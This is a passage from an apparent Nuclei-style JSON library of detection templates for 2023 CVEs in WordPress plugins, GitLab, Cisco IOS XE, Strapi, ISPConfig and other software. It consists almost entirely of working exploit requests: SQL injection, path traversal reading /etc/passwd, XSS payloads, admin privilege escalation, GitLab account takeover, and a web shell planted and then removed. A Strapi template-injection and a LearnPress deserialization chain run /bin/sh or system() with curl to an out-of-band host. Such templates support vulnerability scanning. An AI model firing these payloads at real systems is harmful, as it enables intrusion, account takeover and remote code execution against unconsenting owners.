/wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress_username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress_username","group":1,"regex":["<\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress_username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ wordpress_username + \" WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-3188","info":{"name":"Owncast - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/remotefollow HTTP/1.1\nHost: {{Hostname}}\n\n{\"account\":\"a@{{interactsh-url}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["success\":","message\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-6567","info":{"name":"LearnPress <= 4.2.5.7 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(header, \"lp_session_guest=\", \"application/json\")","contains_all(body, \"status\\\":\\\"success\", \"No courses were found\")"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-44812","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"body","words":["mooSocial"],"internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"\")"],"condition":"and"}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46818","info":{"name":"ISPConfig - PHP Code Injection","severity":"high"},"requests":[{"raw":["POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&s_mod=login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"Set-Cookie\")","status_code == 302"],"condition":"and"}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(response, \"_csrf_id\", \"_csrf_key\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"lang_file_location","group":1,"regex":["Language file: (.*)"],"internal":true},{"type":"regex","name":"csrf_id","group":1,"regex":["_csrf_id\" value=\"(.*)\" />"],"internal":true},{"type":"regex","name":"csrf_key","group":1,"regex":["_csrf_key\" value=\"(.*)\" />"],"internal":true}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('\u00a7echo-cmd\u00a7')}}\n"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["{{echo-cmd-hash}}"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7lang_file_location\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7websh-file\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43325","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36144","info":{"name":"Intelbras Switch - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/exportCfgwithpasswd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System Description","System Version","System Name"],"condition":"and"},{"type":"word","part":"header","words":["attachment;filename="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1 posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-7028","info":{"name":"GitLab - Account Takeover via Password Reset","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"token","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /users/password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/users/password/new\n\nauthenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n"],"payloads":{"username":["admin@example.com","admin@{{RDN}}","root@{{RDN}}","gitlab@{{RDN}}","git@{{RDN}}"]},"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'smtp')"]}],"extractors":[{"type":"dsl","dsl":["username"]}]}]},{"id":"CVE-2023-20198","info":{"name":"Cisco IOS XE - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\nHost: {{Hostname}}\n\n admin***** {{cmd}}"],"matchers":[{"type":"regex","part":"body","regex":["XMLSchema","execLog","Cisco Systems","",""],"condition":"and"}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["\\n(.*)\\["]}]}]},{"id":"CVE-2023-4714","info":{"name":"PlayTube 3.0.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["razorpay_options","PlayTube","key:"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","regex":["key: \"([a-z_A-Z0-9]+)\""]}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-6553","info":{"name":"Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"Backup Migration\")"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"],"headers":{"Content-Dir":"{{rand_text_alpha(10)}}"},"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","!contains(body, \"Incorrect parameters\")"],"condition":"and"}]}]},{"id":"CVE-2023-35155","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Applications","Navigation HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-30868","info":{"name":"Tree Page View Plugin < 1.6.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\") && contains(body_2, \"CMS Tree Page View\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-31446","info":{"name":"Cassia Gateway Firmware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","regex":["^OK$"]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n \"title\":\"Kernsicherheitstest\",\n \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-1408","info":{"name":"Video List Manager <= 1.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"Edit Video\",\"Youtube\")"],"condition":"and"}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6275","info":{"name":"TOTVS Fluig Platform - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">","fluig://"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50968","info":{"name":"Apache OFBiz < 18.12.11 - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /partymgr/control/{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n"],"payloads":{"path":["getJSONuiLabel","getJSONuiLabelArray"],"parameter":["requiredLabel","requiredLabels"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-22232","info":{"name":"Adobe Connect < 12.1.5 - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"],"matchers-condition":"and","matchers":[{"type":"word","words":["Save to My Computer","exam.pdf","Click to Download"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38501","info":{"name":"CopyParty v1.8.6 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"\",\"\\\">go to\")"],"condition":"and"}]}]},{"id":"CVE-2023-5360","info":{"name":"WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"uploaded_file\"; filename=\"{{file}}.ph$p\"\nContent-Type: image/png\n\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"allowed_file_types\"\n\nph$p\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"triggering_event\"\n\nclick\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"wpr_addons_nonce\"\n\n{{nonce}}\n-----------------------------318949277012917151102295043236--\n","GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["WprConfig\\s*=\\s*{[^}]*\"nonce\"\\s*:\\s*\"([^\"]*)\""],"internal":true},{"type":"regex","name":"filename","part":"body_2","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/wpr-addons\\\\\\/forms\\\\\\/(.*?).php"],"internal":true}]}]},{"id":"CVE-2023-3521","info":{"name":"FOSSBilling < 0.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin?_url=%2Fadmin&date_to='\">&date_from='\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","FOSSBilling"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22621","info":{"name":"Strapi Versions <=4.5.5 - SSTI to Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{email}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"token\",\"isActive\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"token","json":[".data.token"],"internal":true}]},{"raw":["PUT /users-permissions/advanced HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"unique_email\":true,\"allow_register\":true,\"email_confirmation\":true,\"email_reset_password\":null,\"email_confirmation_redirection\":\"{{RootURL}}\",\"default_role\":\"authenticated\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /users-permissions/email-templates HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\n \"email-templates\": {\n \"reset_password\": {\n \"display\": \"Email.template.reset_password\",\n \"icon\": \"sync\",\n \"options\": {\n \"from\": {\n \"name\": \"Administration Panel\",\n \"email\": \"no-reply@strapi.io\"\n },\n \"response_email\": \"\",\n \"object\": \"Reset password\",\n \"message\": \"

    We heard that you lost your password. Sorry about that!

    \\n\\n

    But dont worry! You can use the following link to reset your password:

    \\n

    <%= URL %>?code=<%= TOKEN %>

    \\n\\n

    Thanks.

    \"\n }\n },\n \"email_confirmation\": {\n \"display\": \"Email.template.email_confirmation\",\n \"icon\": \"check-square\",\n \"options\": {\n \"from\": {\n \"name\": \"Administration Panel\",\n \"email\": \"no-reply@strapi.io\"\n },\n \"response_email\": \"\",\n \"object\": \"Account confirmation\",\n \"message\": \"<%= `${ process.binding('spawn_sync').spawn({\\\"file\\\":\\\"/bin/sh\\\",\\\"args\\\":[\\\"/bin/sh\\\",\\\"-c\\\",\\\"curl {{interactsh-url}}\\\"],\\\"stdio\\\":[{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"},{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"/*<>%=*/}]}).output }` %>\\n\\n

    <%= URL %>?confirmation=<%= CODE %>

    \\n\\n

    Thanks.

    \"\n }\n }\n }\n}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["POST /api/auth/local/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"email\": \"{{address}}\",\n \"username\": \"{{randstr_1}}\",\n \"password\": \"{{randstr_2}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["ApplicationError"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \">\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-6634","info":{"name":"LearnPress < 4.2.5.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\nHost: {{Hostname}}\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\nHost: {{Hostname}}\n\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(interactsh_protocol, 'http', 'dns')","contains(body, 'Error: data content invalid!')","contains(body_1, '
    {{randstr}}
